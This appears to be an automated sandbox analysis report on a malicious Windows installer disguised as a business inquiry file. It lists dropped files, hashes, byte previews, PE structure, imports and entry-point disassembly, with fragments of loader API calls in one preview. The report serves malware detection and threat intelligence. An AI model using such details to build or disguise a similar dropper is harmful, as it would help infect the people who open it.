                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):3350
                            Entropy (8bit):4.894453707611395
                            Encrypted:false
                            SSDEEP:48://vGRembfsNciS59pnhjSQZPbKDPiaI6hI2VmwLJ0z6G0mQuN4hZ:/wkNGdhjS2PbVAmwF0t0T
                            MD5:16AF1A5579221F98F7A49F0A9E521704
                            SHA1:B9C4E48C381998605EA86DCD99C4F116BF2D2790
                            SHA-256:FDB32CC85C39D7FA95FF9634B7AB406F1959C6388A60F0ED7877EC1A492D6EE3
                            SHA-512:4BF5749FFB3C367728610C3D9B8640E4A3663AACAB47C898C5C5E7DCDAB54C15E4368DF4819F2467D9E22D6716860E4F0F6DE12361F48BF8C1AFED35F2136ED9
                            Malicious:false
                            Reputation:unknown
                            Preview:..'...c.k.......R...PW...D?.......5....I...F............*..;..`..).#..d.....PV....$5.i....R..z.....?...=^...6..~"=........$.....Gsa..Fx;.....;...).3.............4.......I.v..~s.&......D.3[.=.......K./.}....K..................l............]@o................E....`.....V.....,...C........-1..R...o.......^.*....h.....$..............f.."......C.vB.'...r.?.]........."...........o.....ss..[...b........s..m....:.R.J............)..s....pj.^O.......P$.k.r.........=.=.y".......%.1.(.{=....w...[......o.....q.......0.9......L..D.......................v........M..........<..9.......M.........I.g...Z9..q....K...........X.............U....s.M.m.*...G.....Z?..@...k....../....p..$...aJ.....d.....F....:..\. .5.........O.0.V.G........O.......X..4.....o...a...#.......v...........c8....a.........3.@...................(.......Z...........Y4.GJ.&.H..........A^....1.........`#.b...........8.............."..............$R..........w}...............C...f.{..u............{yN....w.....................
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):13209
                            Entropy (8bit):4.958809693126459
                            Encrypted:false
                            SSDEEP:384:A0BxOjCRAKa0HAMddbG798fJhmTu1US21:7S4PahS8SJpKSo
                            MD5:A0EED22B474BBB911B0CBD28BDD4A543
                            SHA1:3810338ADD88F5AB3837AEB87AD0C8CD66C20AEC
                            SHA-256:02D407A9D84325C5A53D156AB1008A5A7DAEDBC6087C0BB21AED461976EE5EB6
                            SHA-512:EAD609280EDEC21AE14B2514D2356B1B39FE3760B2419E63172EAFA095DB900069EB8D5FA36D6BEBB7A81DD3796234794D90BC0EE742542C20AE18DEE211036F
                            Malicious:false
                            Reputation:unknown
                            Preview:..........Y.....2.`...`....!..~.......>.@....~b.ic....|6.@..............m.........V.......|"..0......N8................N...{.hB...h~.(......S.B........`.......N.......................F....C...V2.........z.*.............L..........................N....%........CB........................;.r............S...........q.F.1.J..?.....|.Q......`...P.......a.z..2....b...]..D.....1D................h...q.........:.............NY....."..2..g....B.*.Cg......d....2n."....D.......C..M......(....F...&r.&................Z..........x.....a...;C..........U...........]#.T.C]..............M...........p.,..Q%.Z...9...m.np...H....4.e..=...........f.....%..............k.r.Q5i.e......m..|..&..D..0....u.*y.....R.P8.z...x..d...h....g................5mM.\........#Q".....z..2..^..........W....M....(................B3.../.q..t........)...U..6..................-jM...................+.*_.........D...........F....u./.p..................9........l#..h...T...N.\[..D...z.....J................m.....e:...N...P....
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):2501
                            Entropy (8bit):4.812074749205284
                            Encrypted:false
                            SSDEEP:48:YzKTprRUztTLPa86AEg32I6bSmPd30YDvSQLc3hePoE/eHv4d1w:bUu42NbBh0AaQJPIPuC
                            MD5:ED9E84934782D5FDC90AC9781DC9A6E1
                            SHA1:39DD2E37586C5CB5DD86A9F6A987C1FCDFF45FFF
                            SHA-256:37AD2DBD7F711971FD8DDD2BD78D5BDFEAACF52724FF9D7C7FC9B293F7C9B5FE
                            SHA-512:07FE7559008D6E528E8227BD64F305BA51EB739128067FCA911485F02F5A07B4531B6B5CD3D32A2CF02114CA27E64E0B32FCC1D813B55FE2EA00F33D0843D598
                            Malicious:false
                            Reputation:unknown
                            Preview:*...C.....RI.......I....>f..........@.S.+...........#........f....1...2.b...c....$W.C...j....A.E...G......j....`...0.....K.............4......l%.2.....W....d.H..............W..p....x...3...j....N..W.........)...k.....B..0...h..8..P......\...P._...........6....u,$.......t..A.......n....2.p.......B.........O..|.:....$2......P.............p........i..............J..C....-.%.c....r..d...p.$.....~.......}H......e.X......>.!.D....7.n........c.E.....+.......{...;T..6...F..n...................h.g...\.....}........gV..x.M5......t.........C..ju...6.............1......-G..............l.....................fy.........l....$................O.z.r..w.......c...Y.........".sqj. ...........E.........^r..$.t^..........r.l......).......A9.............................V>x..6P..a.....Z...........x...6,..................(.o.......2.V.........q..D.D..........B.J.(......R..Z.f.....}.....c...F5F.......I.D....>..._M..`.........f.iL..............t.........-......}.............9...........!...........D..
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:TeX font metric data
                            Category:dropped
                            Size (bytes):2577
                            Entropy (8bit):5.07901334387277
                            Encrypted:false
                            SSDEEP:48:qFvj/6l92Aw0Xf3MtDM81l4U3d2pjLAFQKm12qEIVH4oqTVzj9lPj3UFhCNQ:wjGnw0fWD1l4UNYLXKBqbA/PjwhR
                            MD5:5FEC97594CEB46A5C143053B0A9FA6E2
                            SHA1:8B9C1B04B41BE3AE4E9D4909D873D7A3BC67272B
                            SHA-256:02F91F9E1D345BD7DAA518A98B5FD84B8DAE146633A6A8F3B15C0586D8C074DE
                            SHA-512:A3832EBBB5DB00C38FA4F60F9BA687499E4FCA6F5C036E4B7BD3C1F1039C0425B7B8B82D834B00E39557F40748DA5E725E6000C2A0BAD0701B11BCEDF96CF395
                            Malicious:false
                            Reputation:unknown
                            Preview:.o...9T...z............K...xR`.....N........]+...............x....'.....T................(.........j....$.......>....!..........1y............i......a..../..r..d.n.......a....=>a.........j...;........U...,.....Q........P3..2.....xr..i`,............*..9........~.O....C...<.........9.......OW.....5..p./.x.D,...~.....}...........-....R.......)>...M.[...........*......o..."...%........r......_.Y....Og......v......................w+........r.........2..................q.............Z.N.....................q`.T(...j6....t....c/.......c...1.......M............aC.......C..0...."...J.B......=............Y,....+............K/.k+Q}.........}o...\e..w...R..."...l<..../..^.S2...V....?.......e.i........|.......a.A...V...............I........................H..J.._.........1..w.._.................)~.............U6..L..........M..J.8.9.h.4.....O.1o.....Ll...........Q..../.E=....z^.(..^0.....>.+....4.E.H.G.M...\.=......`....:...'.m..E...W....v..G"..z..........Sq...............8d...........
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                            Category:dropped
                            Size (bytes):23244
                            Entropy (8bit):7.540912926808858
                            Encrypted:false
                            SSDEEP:384:wZVE8byaUmJ0B1YWBWiU+y/KnPXLeO/4NK05cT8SLs3afUXiH43j:wbrbz6HYWBWiZy/KnP49cTbfUXr
                            MD5:18E048BA7596E10380F1AE242781B676
                            SHA1:AEA8403BFC4B42ADDC05F6098D5EE56E8BABC532
                            SHA-256:69881C64F796D9F2571116A8E6C3D9E1B77E6EB1A2CAFE6C9A333E6EE486B842
                            SHA-512:E5599C1F77C9DB3E027A2B38727F374E1746DD1281F42AC6397E478B9E4FCFC5A769AE8EA3F20333A409CBBCE28CE1C7869B44336D7E4EE4D5F41609C6EE30FE
                            Malicious:false
                            Reputation:unknown
                            Preview:......JFIF.............C....................................................................C.........................................................................................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....?.3...?.Q...w.......5.."._............./.3L...g_..?....j.........O.>...4........0...9.......G.^............_....../.=L...V?.O.....S>g....%.W.......~.._.+...o..L....K.w.....4.x.....v...o...~Tz..I..$'........P....}._...P..~._./............n......g.e.....p.......o........_r.+.....U@.....|..............%...]_.w..JG....w......f...~R...E..g.X..P.9...D.C.........WW
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:ASCII text, with very long lines (364), with CRLF line terminators
                            Category:dropped
                            Size (bytes):443
                            Entropy (8bit):4.26226221852899
                            Encrypted:false
                            SSDEEP:12:QhhpvdH/VEZ66gB2tzWlnyEKXL2WMeZ9JDHoJt:QhhFxdEZG20lKJM09Not
                            MD5:052A3D0375E8EEB3A6A667ABFFC5F0EF
                            SHA1:761CA63CE01BAE7BD014F1CBF299E3432604B8AE
                            SHA-256:D4E94A18C627B29290276983B249D999F0F5DF0233A2D8CE187DC7978D70AA18
                            SHA-512:716B27E42775AC6A96BCA6ACE56D207362AEB8889DB4DC10160A3F37D6C313E52F67EB70D8201B288B34CAF0238FC332AB7DB9297E42818FA7E963697EEC0E43
                            Malicious:false
                            Reputation:unknown
                            Preview:forklike carnaubas demythologising gdedes maranhao overgangsregeringen,skabhals avaradrano socialize dyssede rreddam resorufin.molybdn inogenic fyrsteder tachograph udsavende.skovsyrerne tilkendelsernes cerning,thenabouts fjerntrafikkernes squall beclamor profounder talomraadet driftskontrollers forsikringssummernes geometricise indeterminismes isopolite adsmith..derealization eforen unilluded nondisbursable rdstensmure blighties fadllers,
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):3309
                            Entropy (8bit):4.898399826501928
                            Encrypted:false
                            SSDEEP:96:+f7M5oZ8Y0WrHmP+DwnfcXed5TAd6pivr:+TKS8Y024TccAd6pQ
                            MD5:1E5426FBAE44458D0B5526B99D0958CA
                            SHA1:E0934E69B42ABFDD6695ED678077725ECF0B5084
                            SHA-256:EA79B75BC89ADB3FAAFF4C957AFCD5CEEE4A40B88F22BBED3B045C659517B9A5
                            SHA-512:C63CD9C148ACBEFB50F49B6168C0BD2D01D2A62629ECA8DCDFFD05A269D6092871D2CA7DFA86C3629453B8791E63F90C4A61CF6EF8E6F47194F39BAF595A7B10
                            Malicious:false
                            Reputation:unknown
                            Preview:.i......~cn.?...G........1h......."Y.........in..............b...}....K.7.............Og..{................g......r.O.........u.....a..:......W.A...l......&.....B.[...<..$.....A.........k...s.|...X...:..Y..S...3.I.. .m...b......k0..,[................(..............L;.....)..................t...Y...:... ......i..s...r...................c....=...].....Z...e..>....[......Q.H'................A.....J..m.s...q,.W.............&s.=.*..... .........!......t0.............L:.0..N...1......."..........Gm.......}......n............X3R....c..W...T.......4....7...'..`.....y:.......c...[..o,....6.T0...~/.....r...I.......`....`.t...........8.............7...z.............*.B.....Yr...7l.w.........`.....?...f....e....*..7.........9......b._............^...G}....G..@.m....Q.$..I........,.%.....d.....B.w......)......... ........................^...a....B..i....66.=.73...*...t.......r&.-......s..........F....h........]................2#....v...r$...............4.......T.....y... .x.....a.....a..M
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):13465
                            Entropy (8bit):4.947258320601266
                            Encrypted:false
                            SSDEEP:192:ftl1uywODc/D4zuFLp+h9JqgH01ZFDwMVyDdb8m7wzLqb8IpcypMHKc4nqAtpGn:f/YvqWDt898gU1ZFDwMIIr94G
                            MD5:2AE1A3CDABC68B7F2AA156DC80A8BA6A
                            SHA1:E3065DB21D4CD531E715CB46B300FAC2A3AD2289
                            SHA-256:D5443C561171FDE4676C329F857AE86851BAD9755348EC79B9B54CDB60555BBE
                            SHA-512:03A1C5CD20A980A248ACF0EEAD25E0E77227F70082622BE4CB56B6F86FA3D366CB9567C4418CE2001A8534B57D77A27541F8C90BE56DE8C79E1762F4D1068BF2
                            Malicious:false
                            Reputation:unknown
                            Preview:..........z..E..........w...W.2...]jD.......Ow.5......%........$..........$..o.....j.&..........`..Fuf...\.......l..e.w.:...(j....k.......q...........................U....%.....Z.T...........U..e..#%.........A...s.9......\.3....b.....E......t.... .........)...5.............}]...I..Q.......b........X:..S..[.......o.7...0...$........%...............c............l..........]...9.|.......G.................e7.........,..........H..o......H..n..`.4....S:...3Je............)..j.m~..p-......U.....&........Y..........Q'....!........I.}.H..q..-.r..iL..-....i......./.................!..$...R.b............5.......................*.0..@..X.>.................O......R.c..............M...........S......M...}.......A.5.........k.....M.\.................v...N............[.".B...M.....-............=..E......W...+......cE-yf..........>.5....T.................U..$\....D..*.........t......a.(.....U........................*..........e...X......q..f.............'........2<P.......:M.>...........
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:TTComp archive data, binary, 1K dictionary
                            Category:dropped
                            Size (bytes):7722
                            Entropy (8bit):4.85176842716064
                            Encrypted:false
                            SSDEEP:192:nZFPnCY2Hm36vHT+Tm7rsMnTRmGJ/w79zdpwIf6S:7fCLHm36PT+Tm7gMTbxwxdpxz
                            MD5:29907025DE7D88B9E24D525BCFCD0ACA
                            SHA1:992446AAE89264303D61432F16C934781A628EB1
                            SHA-256:2EE335FBD15E3E22CF0522BF4A7FA28E58C329E2B1691A01CD40DC4E18C7A4E3
                            SHA-512:29215F48A2F67FCE3B25AB7F6497A27DAC1E97EA35847830706FC073558E51775371BC9FCFDDFB760832E420FAE8DA2F106B2E62418DB2004EC400FBBF067A2E
                            Malicious:false
                            Reputation:unknown
                            Preview:....l.....K..F..q5}...............................h....e..&{....U+....3.........u.0..e.....?.......q..........>..........nMh.;.....+BE..s.@.........B..........F......................C......+6.........|I.....o......=...........\.....s.......$...........Q...D..w....1.....9.A....>...k-...[.........._........;......=....p.0u..p..a[....*..).(.,.q.. ....................(..~y..a.3........As.................+.........Z...:.~.8...6.a..............mz......H.......%.....:....s^.......n..^....n2....b...W.V...........P........!...@\.k..>T.............*... @.....v....3....<.....`...X.....%..................P.....h....?....Q...Ux..........@q....../........4..........J.N.................w.......................r/.....................z^.......;..H......u....`.....e.........O.*N.#...v.........h.z.....4..+.h.E....X....~.........w............2...~..^.X.@......_....;............g.........qW.................y ......................<....n.s......!.....`....H..........(..L.......J......T.........
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):3105
                            Entropy (8bit):4.917605198162765
                            Encrypted:false
                            SSDEEP:96:qPt4g9NwI1VI64tPI9331YoNn4szSJaIryd:I4gjv2r0yoUJ/yd
                            MD5:2820C0E9196BFB3569D0957C4D310813
                            SHA1:44B546C5A75241DECB0D419D509D86B0F83A228F
                            SHA-256:2DB6D4FE9932E4D1F9A3FCF304FB869EA176385B5BB24DF8FE1B64179D3A5F5E
                            SHA-512:57DF8A0782035D14DB6D29628FF210658A5395A31C614FB55EA1C93753FD9DCD07233BCD2264F8DC6522F90DCE28A852D6A4EB6A690D8B8BE11A11A22F9A9962
                            Malicious:false
                            Reputation:unknown
                            Preview:.K_.^.......(.........{,....l.o.&...... ._..U..b.....u .G.{.......m.S....~._...4..n.......'.......i_..>........j(.e../.......H.@......N.........v...l......O........5.......O9........(./.p........lV.".fU...j........%.........x.....]....q......M......'.....+..7...$.........$.....b...~......9.....V..?.\..UV...............}....h9...C......Z.....@..7......\.....n.......Z................g..................W,..0.O...M=.......'........o.+.......d.......m........J.P.$............`...m.....r..,......../.<..........k........D`.......p...1..............e...4x........E...^...d....%..................S..s............f........Y..........y............k.........p.......w..........k..|.......:H..+I2.......)...I,...>....o..........{......~..R.?...^... .@...]......G...Ee...............]..a.........~........l........o...y..|....c.......`dl.......{................'....J!.......g....+.v....;....3.v..t.........w.(..T.......J.>o.n.............}..Y......a....Xz..i!.........a....j..3...........i?..........
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):9978
                            Entropy (8bit):4.908627124521558
                            Encrypted:false
                            SSDEEP:192:lT1mzLGWI8BObOtq2V6JCGtsNigpgDjR1i8BxwYwu+p6:lTSI80bOgC6R7X+p6
                            MD5:D1AA27BE4695EFFDE130C89CA7BFBC62
                            SHA1:32CF0D7B76A74A29B94E3F05858E0DA7DFCC9F08
                            SHA-256:F209716D597B246F27998DA4749DB45AD61A645DE446E886463D18CB54DD187D
                            SHA-512:AA635DDF1F0F9A0DD7812B341C67624D193AA1BE7D0C2AA88AE64A2F51F1849323A3173EE6784D481BF91307FFF55CF66EF6271FB8CDBD901CA3000A1FAFFB71
                            Malicious:false
                            Reputation:unknown
                            Preview:..;...........L...L.P.....h......Ur...B..i.....'hV..................}..dI..WN......kS...V.....................p..^C.X...?...d.....;.OU.K.............L`......}.".............................Q..........H......O.20Z................+....k..h........r...X.........................!.............u...Z.s.........'l...........z..Jn..Z..........n'.a.......~......:.........e.....a....../.....D........n.......Q.G.....j.......~...................h.......?R...........i..Py.L...............@.}....g...Y.1K(L.(..J..................}........6...........w...........r..}...$....E.@..c+.\...........Fn....].".n....M....C....Ta...f....=p..K;....U.4...x..[.'........3........._......t....T.8......i.+.q........Z...i......B...g....O....[..9.t.................b...b...d..j...+...e..M:...!....`...............y......K.........zR.........G....e?._.........................-J...a.......H....0........C......f...........h......h......(.o......%......E...............m.....Qh............................u..._8..U.....
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:Matlab v4 mat-file (little endian) b, numeric, rows 1549533270, columns 92
                            Category:dropped
                            Size (bytes):19192
                            Entropy (8bit):4.530212457449997
                            Encrypted:false
                            SSDEEP:384:YEmyEI1ywgTW3EYctVOvdxF9X/5Wb8ajDQ4yyt3pN6:HEIgLTW3LyAvd3BPajDQcL6
                            MD5:7BA652FE5FF35AD28FF5C12A2A261299
                            SHA1:6FD70D95A13D9E6073E3E74E5AFC910D7D104F75
                            SHA-256:350DA7EA6DA67AC3A6C6B27580E5F7EB15569CAB700EB3B441510583E675F820
                            SHA-512:129A20408C54DA333BB42E6763023D3C8F6AE5FD437856505EBD01CBED69C865977F83CD03B8C9626274BBCAF7731557F505FB03B452BF1BBF820B3E6E9F9A41
                            Malicious:false
                            Reputation:unknown
                            Preview:....V.\\\...........b.....................LLLLL...\\\\\...}..9.............)))....#.........T..k...e...r...n...e...l...3.."2...:.//:.F.C..5r...e...a.g.t...e...F...i...l.^.e...A...(...m... ...r.RR4... ...,..c ...i... ...0...x...8..W0...0...0...0...0...0...0.[[,... ...i... ...0...,... .MMp... .n.0...,... ...i... ...4...,.Y. ...i..p ..H0...x...8.XX0...,... ...i..C ...0...)...i.......r..i8..Rq...k...e...r...n...e.._l...3...2...:...:...S.**e...t...F...i...l...e...P..To...i.[.n...t...e...r...(...i... ...r...8...,... .[.i... ...2...3...0...1...2... ..B,..% ...i... ...0...,...i... ...0...).r.i.......r...4...q...k...e.[[r...n.v.e...l...3..O2...:...:...V...i...r...t...u.y.a...l...A...l...l...o...c...(...i... ...0...,...i... ...4...6...1...0...8..E6...7...2. ,... ...i... ...0...x...3...0...0...0...,... ...i... ...0._.x...4...0...)..dp.......r...2...q...k...e...r...n...e...l...3...2...:...:...R...e...a...d...F...i...l.qqe...(...i..X ...r...8...,... ..li..F ...r..H2..t,... ..bi... ...4...6...1...0
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Category:dropped
                            Size (bytes):424184
                            Entropy (8bit):7.730132782946701
                            Encrypted:false
                            SSDEEP:6144:Y7eCdHpEMIeSdeNuUeOR7LTmlE8uf58dnABhc+Ku5hygOdtUwj0TnmuqXdG:6PNAd7nOtS4EJi5hygoRu6Xw
                            MD5:B0058626C77841FEA067AA436FF4F1E7
                            SHA1:CB42FD42E35FFAAB9EB7000F0E3DF59C2BA4EC7A
                            SHA-256:0459C020742F5356D25D14F2CD937ECEE923A54402246DC521452A6C9B353119
                            SHA-512:76CAEF3EBCDE654C9237110A632C4ACB1397843AEE53FBFF73D6686233D0FCE0FFAE12AB2764ABEA3FC8426379F306BC65CCDEC4D9FDA468D300FCB5054D74C3
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            • Antivirus: Virustotal, Detection: 29%, Browse
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L...)..\.................d...|.......2............@.......................................@.................................<...........h............................................................................................................text....b.......d.................. ..`.rdata..\............h..............@..@.data....U...........|..............@....ndata...................................rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Entropy (8bit):7.730132782946701
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File size:424'184 bytes
                            MD5:b0058626c77841fea067aa436ff4f1e7
                            SHA1:cb42fd42e35ffaab9eb7000f0e3df59c2ba4ec7a
                            SHA256:0459c020742f5356d25d14f2cd937ecee923a54402246dc521452a6c9b353119
                            SHA512:76caef3ebcde654c9237110a632c4acb1397843aee53fbff73d6686233d0fce0ffae12ab2764abea3fc8426379f306bc65ccdec4d9fda468d300fcb5054d74c3
                            SSDEEP:6144:Y7eCdHpEMIeSdeNuUeOR7LTmlE8uf58dnABhc+Ku5hygOdtUwj0TnmuqXdG:6PNAd7nOtS4EJi5hygoRu6Xw
                            TLSH:0494F147BB0C87AEE76C8BF2347A47308749CF931184AD55BBD4FE6E047258D690A2E1
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...)..\.................d...|.....
                            Icon Hash:24ed8d96b2ade832
                            Entrypoint:0x40320c
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x5C157F29 [Sat Dec 15 22:24:41 2018 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:3abe302b6d9a1256e6a915429af4ffd2
                            Instruction
                            sub esp, 00000184h
                            push ebx
                            push esi
                            push edi
                            xor ebx, ebx
                            push 00008001h
                            mov dword ptr [esp+18h], ebx
                            mov dword ptr [esp+10h], 0040A198h
                            mov dword ptr [esp+20h], ebx
                            mov byte ptr [esp+14h], 00000020h
                            call dword ptr [004080A0h]
                            call dword ptr [0040809Ch]
                            and eax, BFFFFFFFh
                            cmp ax, 00000006h
                            mov dword ptr [0042F40Ch], eax
                            je 00007F6581922843h
                            push ebx
                            call 00007F658192591Ah
                            cmp eax, ebx
                            je 00007F6581922839h
                            push 00000C00h
                            call eax
                            mov esi, 00408298h
                            push esi
                            call 00007F6581925896h
                            push esi
                            call dword ptr [00408098h]
                            lea esi, dword ptr [esi+eax+01h]
                            cmp byte ptr [esi], bl
                            jne 00007F658192281Dh
                            push 0000000Ah
                            call 00007F65819258EEh
                            push 00000008h
                            call 00007F65819258E7h
                            push 00000006h
                            mov dword ptr [0042F404h], eax
                            call 00007F65819258DBh
                            cmp eax, ebx
                            je 00007F6581922841h
                            push 0000001Eh
                            call eax
                            test eax, eax
                            je 00007F6581922839h
                            or byte ptr [0042F40Fh], 00000040h
                            push ebp
                            call dword ptr [00408044h]
                            push ebx
                            call dword ptr [00408288h]
                            mov dword ptr [0042F4D8h], eax
                            push ebx
                            lea eax, dword ptr [esp+38h]
                            push 00000160h
                            push eax
                            push ebx
                            push 00429830h
                            call dword ptr [00408178h]
                            push 0040A188h
                            Programming Language:
                            • [EXP] VC++ 6.0 SP5 build 8804
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x853c0xa0.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x410000xde68.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x298.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x628f0x64006cd58568c5809fdd0c7dcb006e4acdbaFalse0.6700390625data6.442207080714446IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x80000x135c0x1400b27ba0846d4bbf5bff764f5a5c418a97False0.4611328125data5.240043476337556IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0xa0000x255180x60012c02de2bdc517e2722ceeb84aff8b34False0.455078125data4.04938010159809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .ndata0x300000x110000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x410000xde680xe0009ad433a74c4d6aebc69d4d1f95db1c67False0.10112653459821429data3.8325755646937982IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0x412080xd228Device independent bitmap graphic, 101 x 256 x 32, image size 51712, resolution 9055 x 9055 px/mEnglishUnited States0.07864312267657993
                            RT_DIALOG0x4e4300x100dataEnglishUnited States0.5234375
                            RT_DIALOG0x4e5300x11cdataEnglishUnited States0.6056338028169014
                            RT_DIALOG0x4e6500xc4dataEnglishUnited States0.5918367346938775
                            RT_DIALOG0x4e7180x60dataEnglishUnited States0.7291666666666666
                            RT_GROUP_ICON0x4e7780x14dataEnglishUnited States1.15
                            RT_VERSION0x4e7900x398OpenPGP Public KeyEnglishUnited States0.4880434782608696
                            RT_MANIFEST0x4eb280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                            DLLImport
                            KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                            USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
